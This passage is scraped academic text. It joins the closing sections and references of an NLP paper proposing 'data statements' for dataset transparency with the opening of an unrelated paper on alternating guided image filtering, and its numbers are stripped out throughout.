upsides to the widespread adoption of data state- ments and also help to provide words of caution. they are meant to be thought-provoking and plau- sible, but are not predictive. importantly, the sce- narios illustrate how, if used well, data statements could be an effective tool for mitigating bias in nlp systems. related work we see three strands of related work which lend support to our proposal and to the proposition that data statements will have the intended effect: sim- ilar practices in medicine (§ . ), emerging, inde- pendent proposals around similar ideas for trans- parency about datasets in ai (§ . ), and proposals for ‘algorithmic impact statements’ (§ . ). . guidelines for reporting medical trials in medicine, the consort (consolidated stan- dards of reporting trials) guidelines were devel- oped by a consortium of journal editors, specialists in clinical trial methodology and others to improve reporting of randomized, controlled trials. they include a checklist for authors to use to indicate where in their research reports each item is han- dled and a statement explaining the rationale be- hind each item (moher et al., ). consort development began in , with the most recent release in . it has been endorsed by medi- cal journals. item a, ‘eligibility criteria for participants’ is most closely related to the concerns of this paper. characterizing the population that participated in the study is critical for gauging the extent to which the results of the study are applicable to particu- lar patients a physician is treating (moher et al., ). the inclusion of this information has also en- abled further kinds of research. for example, mbuagbaw et al. ( ) argue that careful atten- tion to and publication of demographic data that may correlate with health inequities can facilitate further work through meta-analyses. in particu- lar, individual studies usually lack the statistical power to do the kind of sub-analyses required to check for health inequities, and failing to publish demographic information precludes its use in the kind of aggregated, meta-analyses that could have sufficient statistical power. this echoes the field- level benefits we anticipate for data statements in building out the data catalog in the value scenario in § . . . converging proposals at least three other groups are working in parallel on similar proposals regarding bias and ai. gebru et al. (in prep) propose ‘datasheets for datasets’, looking at ai more broadly (but including nlp); chmielinski and colleagues at the mit media lab propose ‘dataset nutrition labels’; and yang et al. ( ) describe ‘ranking facts’, a series of wid- gets that allow a user to explore how attributes in- fluence a ranking. of these, the datasheets pro- posal is most similar to ours in including a compa- rable schema. the datasheets are inspired by those used in computer hardware to give specifications, lim- http://www.consort-statement.org/ consort- , accessed july , http://www.consort-statement.org/ about-consort/endorsement-of-consort- statement, accessed july , http://datanutrition.media.mit.edu/, accessed april , http://www.consort-statement.org/consort- http://www.consort-statement.org/consort- http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://datanutrition.media.mit.edu/ its and appropriate use information for compo- nents. there is important overlap in the kinds of information called for in the datasheets schema and our data statement schema: for example, the datasheets schema includes a section on ‘motiva- tion for dataset creation’, akin to our ‘curation rationale’. the primary differences stem from the fact that the datasheets proposal is trying to ac- commodate all types of datasets used to train ma- chine learning systems and, hence, tends toward more general, cross-cutting categories; while we elaborate requirements for linguistic datasets and, hence, provide more specific, nlp-focused cate- gories. gebru et al. note, like us, that their pro- posal is meant as an initial starting point to be elaborated through adoption and application. hav- ing multiple starting points for this discussion will certainly make it more fruitful. . algorithmic impact statements several groups have called for algorithmic im- pact statements (shneiderman, ; diakopou- los, ; ai now institute, ), modeled af- ter environmental impact statements. of these ai now’s proposal is perhaps the most developed. all three groups point to the need to clarify infor- mation about the data: “algorithm impact state- ments would document [. . . ] data quality control for input sources” (shneiderman, , ); “one avenue for transparency here is to commu- nicate the quality of the data, including its accu- racy, completeness, and uncertainty, [. . . ] repre- sentativeness of a sample for a specific population, and assumptions or other limitations” (diakopou- los, , ); “aias should cover [. . . ] input and training data.” (ai now institute, ) however, none of these proposals specify how to do so. data statements fill this critical gap. recommendations for implementation data statements are meant to be something practi- cal and concrete that nlp technologists can adopt as one tool for mitigating potential harms of the technology we develop. for this benefit to come about, data statements must be easily adopted. in addition, practical uptake will require coordinated effort at the level of the field. in this section we briefly consider possible costs to writers and read- ers of data statements, and then propose strategies for promoting uptake. the primary cost we see for writers is time: with the required information to hand, writing a data statement should take no more than – hours (based on our experience with the case studies). however, the time to collect the information will depend on the dataset. the more speakers and an- notators that are involved, the more time it may take to collect demographic information. this can be facilitated by planning ahead, before the cor- pus is collected. another possible cost is that col- lecting demographic information may mean that projects previously not submitted to institutional review boards for approval must now be, at least for exempt status. this process itself can take time, but is valuable in its own right. a further cost to writers is space. we propose that data state- ments, even the short form ( – words), be exempt from page limits in conference and journal publications. as for readers, reviewers have more material to read and dataset (and ultimately system) users need to scrutinize data statements in order to deter- mine which datasets are appropriate for their use case. but this is precisely the point: data state- ments make critical information accessible that previously could only be found by users with great effort, if at all. the time invested in scrutiniz- ing data statements prior to dataset adoption is expected to be far less than the time required to diagnose and retrofit an already deployed system should biases be identified. turning to uptake in the field, nlp technolo- gists (both researchers and system developers) are key stakeholders of the technology of data state- ments. practices that engage these stakeholders in the development and promotion of data statements will both promote uptake and ensure that the ulti- mate form data statements take are responsive to nlp technologists’ needs. accordingly, we rec- ommend that one or more professional organiza- tions such as the association for computational linguistics convene a working group on data state- ments. such a working group would engage in several related sets of activities, which would collectively serve to publicize and cultivate the use of data statements: (i) best practices a clear first step entails de- veloping best practices for how data statements are produced. this includes: steps to take before collecting a dataset to facilitate writing an infor- mative data statement; heuristics for writing con- cise and effective data statements; how to incorpo- rate material from institutional review board/ethics committee applications into the data statement schema; how to find an appropriate level of de- tail given privacy concerns, especially for small or vulnerable populations; and how to produce data statements for older datasets that predate this prac- tice. in doing this work, it may be helpful to distill best practices from other fields, such as medicine and psychology, especially around collecting de- mographic information. (ii) training and support materials with best practices in place, the next step is providing train- ing and support materials for the field at large. we see several complementary strategies to undertake: create a digital template for data statements; run tutorials at conferences; establish a mentoring net- work (see § . ); and develop an on-line ‘how-to’ guide. (iii) recommendations for field-level policies there are a number of field-level practices that the working group could explore to support the uptake and successful use of data statements. funding agencies could require data statements to be in- cluded in data management plans; conferences and journals could not count data statements against page limits (similar to references) and eventually require short form data statements in submissions; conferences and journals could allocate additional space for data statements in publications; finally once data statements have been in use for a few years, a standardized form could be established. tech policy implications transparency of datasets and systems is essential for preserving accountability and building more just systems (kroll et al., ). due process provides a critical case in point. in the united states, for example, due process requires that cit- izens who have been deprived of liberty or prop- erty by the government be afforded the opportu- nity to understand and challenge the government’s decision (citron, ). without data statements or something similar, governmental decisions that are made or supported by automated systems de- prive citizens of the ability to mount such a chal- lenge, undermining the potential for due process. in addition to challenging any specific decision by any specific system, there is a further concern about building systems that are broadly represen- tative and fair. here too, data statements have much to contribute. as systems are being built, data statements enable developers and researchers to make informed choices about training sets and to flag potential underrepresented populations who may be overlooked or treated unfairly. once sys- tems are deployed, data statements enable diag- nosis of systemic unfairness when it is detected in system performance. at a societal level, such transparency is necessary for government and ad- vocacy groups seeking to ensure protections and an inclusive society. if data statements turn out to be useful as an- ticipated, then the following implications for stan- dardization and tech policy likely ensue. long-form data statements required in system documentation. for academia, industry and gov- ernment, inclusion of long-form data statements as part of system documentation should be a require- ment. as appropriate, inclusion of long-form data statements should be a requirement for iso and other certification. even groups that are creating datasets that they don’t share (e.g. nsa) would be well advised to make internal data statements. moreover, under certain legal circumstances, such groups may be required to share this information. short-form data statements required for aca- demic and other publication. for academic pub- lication in journals and conferences, inclusion of short-form data statements should be a require- ment for publication. as highlighted in § . , cau- tion must be exercised to ensure that this require- ment does not become a barrier to access for some researchers. these two recommendations will need to be im- plemented with care. we have already noted the potential barrier to access. secrecy concerns may also arise in some situations, e.g., some groups may be willing to share datasets but not demo- graphic information, for fear of public relations backlash or to protect the safety of contributors to the dataset. that said, as consumers of datasets or products trained with them, nlp researchers, developers and the general public would be well advised to use systems only if there is access to the information we propose should be included in data statements. conclusion and future work as researchers and developers working on tech- nology in widespread use, capable of impacting people beyond its direct users, we have an obli- gation to consider the ethical implications of our work. this will only happen reliably if we find ways to integrate such thought into our regular practice. in this paper, we have put forward one specific, concrete proposal which we believe will help with issues related to exclusion and bias in language technology: the practice of including ‘data statements’ in all publications and documen- tation for all nlp systems. we believe this practice will have beneficial ef- fects immediately and into the future: in the short term, it will foreground how our data does and doesn’t represent the world (and the people our systems will impact). in the long term, it should enable research that specifically addresses issues of bias and exclusion, promote the development of more representative datasets, and make it easier and more normative for researchers to take stake- holder values into consideration as they work. in foregrounding the information about the data we work with, we can work toward making sure that the systems we build work for diverse populations and also toward making sure we are not teach- ing computers about the world based on the world views of a limited subset of people. granted, it will take time and experience to de- velop the skill of writing carefully crafted data statements. however, we see great potential ben- efits: for the scientific community, researchers will be better able to make precise claims about how results should generalize and perform more targeted experiments around reproducing results for datasets that differ in specific characteristics. for industry, we believe that incorporating data statements will encourage the kind of conscien- tious software development that protects compa- nies’ reputations (by avoiding public embarrass- ment) and makes them more competitive (by cre- ating systems used more fluidly by more people). for the public at large, data statements are one piece of a larger collection of practices that will enable the development of nlp systems that eq- uitably serves the interests of users and indirect stakeholders. acknowledgments we are grateful to the following people for help- ful discussion and critical commentary as we de- veloped this paper: the anonymous tacl review- ers, hannah almeter, stephanie ballard, chris curtis, leon derczynski, michael wayne good- man, anna hoffmann, bill howe, kristen how- ell, dirk hovy, jessica hullman, david inman, ta- dayoshi kohno, nick logler, mitch marcus, an- gelina mcmillan-major, rob munro, glenn slay- den, michelle stamnes, jevin west daisy yoo, olga zamaraeva, and especially zeerak waseeem and ryan calo. we have presented talks based on earlier versions of this paper at new york uni- versity (nov ), columbia university (nov ), university of washington (nov ), uc san diego (feb ), microsoft (mar ) and macquarie university (july ) and thank the audiences at those talks for useful feedback. fi- nally, batya friedman’s contributions to this paper were supported by the uw tech policy lab and national science foundation grant iis- . any opinions, findings, and conclusions or rec- ommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the national science foundation. references ai now institute. . algorithmic impact assessments: toward accountable automation in public agencies. medium.com, https: //medium.com/@ainowinstitute/ algorithmic-impact-assessments- toward-accountable-automation- in-public-agencies-bd e fdde, accessed april . american psychological association. . pub- lication manual of the american psychological association, th edition. author, washington dc. emily m. bender. . on achieving and evalu- ating language independence in nlp. linguis- tic issues in language technology, : – . douglas biber. . dimensions of regis- ter variation: a cross-linguistic comparison. cambridge university press, cambridge. steven bird and gary simons. . white pa- per on establishing an infrastructure for open language archiving. in workshop on web- based language documentation and descrip- tion, philadelphia, pa, pages – . tolga bolukbasi, kai-wei chang, james y. zou, venkatesh saligrama, and adam t. kalai. . https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde man is to computer programmer as woman is to homemaker? debiasing word embeddings. in d. d. lee, m. sugiyama, u. v. luxburg, i. guyon, and r. garnett, editors, advances in neural information processing systems , pages – . curran associates, inc. nicoletta calzolari, valeria quochi, and claudia soria. . the strategic language resource agenda. http://www.flarenet.eu/ sites/default/files/flarenet_ strategic_language_resource_ agenda.pdf, accessed august . jack k. chambers and peter trudgill. . di- alectology, second edition. cambridge univer- sity press. danielle keats citron. . technological due process. washington university law review, : – . tei consortium. . tei p : guide- lines for electronic text encoding and in- terchange. http://www.tei-c.org/ guidelines/p /, accessed august . ben coppin. . artificial intelligence illumi- nated. jones & bartlett publishers, sudbury ma. alexei czeskis, ivayla dermendjieva, hussein yapit, alan borning, batya friedman, brian gill, and tadayoshi kohno. . parenting from the pocket: value tensions and techni- cal directions for secure and private parent-teen mobile safety. in proceedings of the sixth sym- posium on usable privacy and security. acm. leon derczynski, kalina bontcheva, and ian roberts. . broad twitter corpus: a di- verse named entity recognition resource. in proceedings of coling , the th inter- national conference on computational linguis- tics: technical papers, pages – . the coling organizing committee. laurence devillers, björn schuller, emily mower provost, peter robinson, joseph mariani, and agnes delaborde, editors. . proceedings of ethi-ca : ethics in corpus collec- tion, annotation & application. lrec. nicholas diakopoulos. . accountability in algorithmic decision making. communications of the acm, ( ): – . penelope eckert and john r. rickford, editors. . style and sociolinguistic variation. cambridge university press, cambridge. rod ellis. . the study of second language acquisition. oxford university press, oxford. susan ervin-tripp. . an analysis of the inter- action of language, topic, and listener. ameri- can anthropologist, ( _part ): – . karën fort, gilles adda, and k. bretonnel cohen, editors. . tal et ethique, special issue of traitement automatique des languages, volume : . batya friedman. . introduction. in batya friedman, editor, human values and the design of computer technology, pages – . stanford ca, stanford. batya friedman, david g hendry, and alan born- ing. . a survey of value sensitive de- sign methods. foundations and trends r© in human–computer interaction, ( ): – . batya friedman, peter h. kahn, jr., and alan borning. . value sensitive design and in- formation systems. in ping zhang and den- nis f. galletta, editors, human–computer in- teraction in management information systems: foundations, pages – . m. e. sharpe, ar- monk ny. batya friedman and lisa p. nathan. . multi- lifespan information system design: a research initiative for the hci community. in proceed- ings of the sigchi conference on human fac- tors in computing systems, pages – . acm. batya friedman, lisa p. nathan, and daisy yoo. . multi-lifespan information system de- sign in support of transitional justice: evolving situated design principles for the long(er) term. interacting with computers, : – . batya friedman and helen nissenbaum. . bias in computer systems. acm transactions on information systems (tois), ( ): – . john furler, parker magin, marie pirotta, and mieke van driel. . participant demograph- ics reported in “table ” of randomised con- trolled trials: a case of “inverse evidence”? in- ternational journal for equity in health, . http://papers.nips.cc/paper/ -man-is-to-computer-programmer-as-woman-is-to-homemaker-debiasing-word-embeddings.pdf http://papers.nips.cc/paper/ -man-is-to-computer-programmer-as-woman-is-to-homemaker-debiasing-word-embeddings.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://openscholarship.wustl.edu/law_lawreview/vol /iss / http://openscholarship.wustl.edu/law_lawreview/vol /iss / http://www.tei-c.org/guidelines/p / http://www.tei-c.org/guidelines/p / http://aclweb.org/anthology/c - http://aclweb.org/anthology/c - https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /iwc/iwv https://doi.org/ . /iwc/iwv https://doi.org/ . /iwc/iwv http://doi.org/ . / - - - http://doi.org/ . / - - - http://doi.org/ . / - - - timnit gebru, jamie morgenstern, briana vec- chione, jennifer wortman vaughan, hanna wallach, hal daumé iii, and kate craw- ford. in prep. datasheets for datasets. arxiv: . v . dirk hovy and anders søgaard. . tagging performance correlates with author age. in pro- ceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natu- ral language processing (volume : short pa- pers), pages – . association for compu- tational linguistics. dirk hovy, shannon spruit, margaret mitchell, emily m. bender, michael strube, and hanna wallach, editors. . proceedings of the first acl workshop on ethics in natural lan- guage processing. association for computa- tional linguistics. dirk hovy and shannon l. spruit. . the so- cial impact of natural language processing. in proceedings of the th annual meeting of the association for computational linguistics (vol- ume : short papers), pages – . associa- tion for computational linguistics. anna jørgensen, dirk hovy, and anders søgaard. . challenges of studying and processing dialects in social media. in proceedings of the workshop on noisy user-generated text, pages – . association for computational linguis- tics. david jurgens, yulia tsvetkov, and dan jurafsky. . incorporating dialectal variability for so- cially equitable language identification. in pro- ceedings of the th annual meeting of the as- sociation for computational linguistics (vol- ume : short papers), pages – . association for computational linguistics. svetlana kiritchenko and saif mohammad. . examining gender and race bias in two hundred sentiment analysis systems. in proceedings of the seventh joint conference on lexical and computational semantics, pages – . asso- ciation for computational linguistics. dan klein and christopher d. manning. . accurate unlexicalized parsing. in proceedings of the st annual meeting of the association for computational linguistics, pages – . association for computational linguistics. roger kreuz and gina caucci. . lexical influences on the perception of sarcasm. in proceedings of the workshop on computational approaches to figurative language, pages – . association for computational linguistics. joshua a. kroll, joanna huey, solon barocas, ed- ward w. felten, joel r. reidenberg, david g. robinson, and harlan yu. . account- able algorithms. university of pennsylvania law review, . fordham law legal stud- ies research paper no. . available at ssrn: https://ssrn.com/abstract= , accessed august . william labov. . the social stratification of english in new york city. center for applied linguistics, washington, dc. bing liu. . sentiment analysis and opin- ion mining, volume : of synthesis lectures on human language technologies. morgan & claypool publishers. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated corpus of english: the penn treebank. computational linguistics, : – . lawrence mbuagbaw, theresa aves, beverley shea, janet jull, vivian welch, monica tal- jaard, manosila yoganathan, regina greer- smith, george wells, and peter tugwell. . considerations and guidance in design- ing equity-relevant clinical trials. international journal for equity in health, ( ): . davida moher, sally hopewell, kenneth f. schulz, victor montori, peter c. gøtzsche, p. j. devereaux, diana elbourne, matthias eg- ger, and douglas g. altman. . con- sort explanation and elaboration: up- dated guidelines for reporting parallel group randomised trials. the bmj, . robert munro. . languages at acl this year. blog post, http://www. junglelightspeed.com/languages- at-acl-this-year/, accessed septem- ber . http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://anthology.aclweb.org/p - http://anthology.aclweb.org/p - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/s - http://aclweb.org/anthology/s - https://doi.org/ . / . http://www.aclweb.org/anthology/w/w /w - http://www.aclweb.org/anthology/w/w /w - https://ssrn.com/abstract= https://ssrn.com/abstract= https://doi.org/ . /s - - - https://doi.org/ . /s - - - http://doi.org/ . /bmj.c http://doi.org/ . /bmj.c http://doi.org/ . /bmj.c http://doi.org/ . /bmj.c http://www.junglelightspeed.com/languages-at-acl-this-year/ http://www.junglelightspeed.com/languages-at-acl-this-year/ http://www.junglelightspeed.com/languages-at-acl-this-year/ robert munro and christopher d. manning. . subword variation in text message classifica- tion. in human language technologies: the annual conference of the north ameri- can chapter of the association for computa- tional linguistics, pages – . association for computational linguistics. lisa p. nathan, predrag v. klasnja, and batya friedman. . value scenarios: a technique for envisioning systemic effects of new tech- nologies. in chi’ extended abstracts on human factors in computing systems, pages – . acm. lisa p. nathan, milli lake, nell carden grey, trond nilsen, robert f. utter, elizabeth j. ut- ter, mark ring, zoe kahn, and batya fried- man. . multi-lifespan information system design: investigating a new design approach in rwanda. in proceedings of the iconfer- ence, pages – . acm. trond t. nilsen, nell carden grey, and batya friedman. . public curation of a historic collection: a means for speaking safely in pub- lic. in proceedings of the acm confer- ence on computer supported cooperative work companion, pages – . acm. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? senti- ment classification using machine learning techniques. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . association for computational linguistics. tomáš ptáček, ivan habernal, and jun hong. . sarcasm detection on czech and en- glish twitter. in proceedings of coling , the th international conference on compu- tational linguistics: technical papers, pages – . dublin city university and associa- tion for computational linguistics. ellen riloff, ashequl qadir, prafulla surve, lalin- dra de silva, nathan gilbert, and ruihong huang. . sarcasm as contrast between a positive sentiment and negative situation. in proceedings of the conference on empir- ical methods in natural language processing, pages – . association for computational linguistics. ben shneiderman. . opinion: the dangers of faulty, biased, or malicious algorithms requires independent oversight. proceedings of the na- tional academy of sciences, ( ): – . rob speer. . conceptnet numberbatch . : better, less-stereotyped word vectors. blog post, https://blog.conceptnet. io/ / / /conceptnet- numberbatch- - -better-less- stereotyped-word-vectors/, ac- cessed july . rachael tatman. . gender and dialect bias in youtube’s automatic captions. in proceedings of the first acl workshop on ethics in natu- ral language processing, pages – . associ- ation for computational linguistics. zeerak waseem. . are you a racist or am i seeing things? annotator influence on hate speech detection on twitter. in proceedings of the first workshop on nlp and computational social science, pages – . association for computational linguistics. zeerak waseem and dirk hovy. . hateful symbols or hateful people? predictive features for hate speech detection on twitter. in pro- ceedings of the naacl student research work- shop, pages – . association for computa- tional linguistics. ke yang, julia stoyanovich, abolfazl asudeh, bill howe, h. v. jagadish, and gerome miklau. . a nutritional label for rankings. in pro- ceedings of the international conference on management of data, sigmod ’ , pages – , new york, ny, usa. acm. jieyu zhao, tianlu wang, mark yatskar, vicente ordonez, and kai-wei chang. . men also like shopping: reducing gender bias amplifi- cation using corpus-level constraints. in pro- ceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computa- tional linguistics. http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - https://doi.org/ . / . https://doi.org/ . / . https://doi.org/ . / . http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - https://doi.org/ . /pnas. https://doi.org/ . /pnas. https://doi.org/ . /pnas. https://blog.conceptnet.io/ / / /conceptnet-numberbatch- - -better-less-stereotyped-word-vectors/ https://blog.conceptnet.io/ / / /conceptnet-numberbatch- - -better-less-stereotyped-word-vectors/ https://blog.conceptnet.io/ / / /conceptnet-numberbatch- - -better-less-stereotyped-word-vectors/ https://blog.conceptnet.io/ / / /conceptnet-numberbatch- - -better-less-stereotyped-word-vectors/ http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - https://doi.org/ . / . https://www.aclweb.org/anthology/d - https://www.aclweb.org/anthology/d - https://www.aclweb.org/anthology/d - submitted april accepted june published june corresponding author alexander toet, lextoet@gmail.com academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. distributed under creative commons public domain dedication open access alternating guided image filtering alexander toet tno, soesterberg, the netherlands abstract edge preserving filters aim to simplify the representation of images (e.g., by reducing noise or eliminating irrelevant detail) while preserving their most significant edges. these filters are typically nonlinear and locally smooth the image structure while minimizing both blurring and over-sharpening of visually important edges. here we present the alternating guided filter (agf) that achieves edge preserving smoothing by combining two recently introduced filters: the rolling guided filter (rgf) and the smooth and iteratively restore filter (sir). we show that the integration of rgf and sir in an alternating iterative framework results in a new smoothing operator that preserves significant image edges while effectively eliminating small scale details. the agf combines the large scale edge and local intensity preserving properties of the rgf with the edge restoring properties of the sir while eliminating the drawbacks of both previous methods (i.e., edge curvature smoothing by rgf and local intensity reduction and restoration of small scale details near large scale edges by sir). the agf is simple to implement and efficient, and produces high-quality results. we demonstrate the effectiveness of agf on a variety of images, and provide a public code to facilitate future studies. subjects algorithms and analysis of algorithms, computer vision keywords guided filter, edge preserving filter, bilateral filter, alternating guided filter, rolling guided filter, image enhancement, noise reduction, edge enhancement, image smoothing, image filtering introduction natural scenes contain meaningful visual elements at different spatial scales. small elements typically represent texture, small objects, and noise, while large scale structures generally represent object or region boundaries, spatial color transitions, or homogeneous regions. spatial filtering is a common operation in image processing and computer vision that is typically used to reduce noise or eliminate small spurious details (e.g., texture) and enhance image contrast. in spatial filtering, the value of the filtered image at a given location is a function of the original pixel values in a small neighborhood of the same location. in linear filtering, the value of an output pixel is a linear combination (e.g., a weighted average) of the values of the pixels in the input pixel’s neighborhood. when the image intensity varies smoothly over space, nearby pixels are likely to have similar values (i.e., they will be correlated). in contrast, the noise that corrupts these pixel values will be less correlated than the signal values, so that averaging reduces noise while preserving the mean signal value. however, the assumption of smooth variation evidently does not hold near edges. thus, although linear filtering can effectively reduce image noise and eliminate unwanted details smaller than the filter kernel size, it degrades the articulation of (blurs) how to cite this article toet ( ), alternating guided image filtering. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:lextoet@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/publicdomain/zero/ . / http://creativecommons.org/publicdomain/zero/ . / http://creativecommons.org/publicdomain/zero/ . / http://dx.doi.org/ . /peerj-cs. the remaining edges, lines and other details that are important for the interpretation of the image. therefore, edge preserving filters have been developed that reduce small (relative to the filter kernel size) scale image variations (noise or texture) while preserving larger scale discontinuities (edges). some well-known non-linear edge-preserving smoothing filters are for instance anisotropic diffusion (perona & malik, ), robust smoothing (black et al., ) and the bilateral filter (tomasi & manduchi, ). however, anisotropic diffusion tends to oversharpen edges (i.e., it produces halos) and is computationally expensive, which makes it less suitable for application, for instance, in multiresolution schemes (farbman et al., ). the non-linear bilateral filter (blf) assigns each pixel a weighted mean of its neighbors, with the weights decreasing both with spatial distance and with difference in value (tomasi & manduchi, ). while the blf is quite effective at smoothing small intensity changes while preserving strong edges and has efficient implementations, it also tends to blur across edges at larger spatial scales, thereby limiting its value for application in multiscale image decomposition schemes (farbman et al., ). in addition, the blf has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: he, sun & tang, ). in the joint (or cross) bilateral filter (jblf) a second or guidance image serves to steer the edge stopping range filter thus preventing over- or under- blur near edges (petschnigg et al., ). the recently-introduced guided filter (gf: he, sun & tang, ) is a computationally efficient, edge-preserving translation-variant operator based on a local linear model which avoids the drawbacks of bilateral filtering and other previous approaches. when the input image also serves as the guidance image, the gf behaves like the edge preserving blf. however, similar to the blf, the gf also tends to produce halos near significant edges. two recently presented iterative guided filtering frameworks have the ability to perform edge preserving filtering without the introduction of halos. zhang et al. ( ) showed that the application of the jblf in an iterative rolling guided filter (rgf) framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. however, the rgf also has a drawback: it tends to smooth the curvature of large scale edges. kniefacz & kropatsch ( ) recently introduced a similar framework called the smooth and iteratively restore (sir) filter. sir restores large scale edges while preserving their curvature. however, sir also has two drawbacks: it reduces the local image intensity and restores small scale details in the neighborhood of large scale edges. in this paper we propose an alternating guided filter (agf) scheme that integrates the rgf and sir in a single framework, resulting in a new image smoothing operator that preserves significant edges while effectively eliminating small scale details. agf combines the edge preserving properties of both the rgf (i.e., the elimination of small details in combination with local intensity preservation) and the sir (i.e., the articulated restoration of large scale edges) while it does not suffer from their respective drawbacks (the curvature smoothing of large scale edges by rgf and local intensity reduction in combination with the restoration of small scale details near large scale edges by sir). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the rest of this paper is organized as follows. ‘related work’ briefly discusses some related work on edge preserving filtering and introduces the rgf and sir filter techniques on which the proposed agf scheme is based. ‘alternating guided filter’ presents the proposed alternating guided filter scheme. ‘experimental results’ presents the results of the application of the agf filter to natural and synthetic images, compares the performance of this new framework with the rgf and sir filter schemes, and provides some runtime estimates. finally, in ‘conclusions’ the conclusions of this study are presented. related work in this section we briefly review the edge preserving bilateral and joint bilateral filters and show how they are related to the guided filter. we also discuss two recently introduced frameworks that iteratively apply joint bilateral filters to achieve selective guided filtering of small scale details in combination with large scale edge restoration. bilateral filter the bilateral filter is a non-linear filter that computes the output at each pixel as a gaussian weighted average of their spatial and intensity distances. it prevents blurring across edges by assigning larger weights to pixels that are spatially close and have similar intensity values (tomasi & manduchi, ). it uses a combination of (typically gaussian) spatial and a range (intensity) filter kernels that perform a blurring in the spatial domain weighted by the local variation in the intensity domain. it combines a classic low-pass filter with an edge-stopping function that attenuates the filter kernel weights at locations where the intensity difference between pixels is large. bilateral filtering was developed as a fast alternative to the computationally expensive technique of anisotropic diffusion, which uses gradients of the filtering images itself to guide a diffusion process, thus avoiding edge blurring (perona & malik, ). more formally, at a given image location (pixel) i, the filtered output oi is given by: oi= ki ∑ j∈� ijf (‖i−j‖)g(‖ii−ij‖) ( ) where f is the spatial filter kernel (e.g., a gaussian centered at i), g is the range or intensity (edge-stopping) filter kernel (centered at the image value at i), � is the spatial support of the kernel, ki is a normalizing factor (the sum of the f ·g filter weights). the bilateral filter is controlled by only two parameters: the extent of respectively the spatial kernel and the range kernel. intensity edges are preserved since the bilateral filter decreases not only with the spatial distance but also with the intensity distance. though the filter has efficient implementations (paris & durand, ) and effectively reduces noise while preserving edges in many situations, it has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood (he, sun & tang, )). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the joint (or cross) bilateral filter (jblf) the range filter g is applied to a second or guidance image g (petschnigg et al., ): oi= ki ∑ j∈� ij ·f (‖i−j‖)·g(‖gi−gj‖). ( ) the jblf can prevent over- or under- blur near edges by using a related image g to guide the edge stopping behavior of the range filter. that is, the jblf smooths the image i while preserving edges that are also represented in the image g. the jblf is particularly favored when the edges in the image that is to be filtered are unreliable (e.g., due to noise or distortions) and when a companion image with well-defined edges is available (e.g., in the case of flash /no-flash image pairs). guided filter a guided filter (gf: he, sun & tang, ) is a translation-variant filter based on a local linear model. guided image filtering involves an input image i, a guidance image g (which may be identical to the input image), and an output image o. the two filtering conditions are (i) that the local filter output is a linear transform of the guidance image g and (ii) as similar as possible to the input image i. the first condition implies that oi=akgi+bk ∀i∈ωk ( ) where ωk is a square window of size ( r+ )×( r+ ). the local linear model ensures that the output image o has an edge only at locations where the guidance image g has one, because ∇o=a∇g. the linear coefficients ak and bk are constant in ωk. they can be estimated by minimizing the squared difference between the output image o and the input image i (the second filtering condition) in the window ωk, i.e., by minimizing the cost function e: e(ak,bk)= ∑ i∈ωk ( (akgi+bk−ii) +εa k ) ( ) where ε is a regularization parameter penalizing large ak. the coefficients ak and bk can directly be solved by linear regression (he, sun & tang, ): ak = |ω| ∑ i∈ωk giii−gkik σ k +ε ( ) bk = ik−akgk ( ) where |ω| is the number of pixels in ωk, ik and gk represent the means of respectively i and g over ωk, and σ k is the variance of i over ωk. since pixel i is contained in several different (overlapping) windows ωk, the value of oi in eq. ( ) depends on the window over which it is calculated. this can be accounted for by averaging over all possible values of oi: oi= |ω| ∑ k|i∈ωk (akgk+bk). ( ) toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. since ∑ k|i∈ωk ak = ∑ k∈ωiak due to the symmetry of the box window eq. ( ) can be written as oi=aigi+bi ( ) where ai = |ω| ∑ 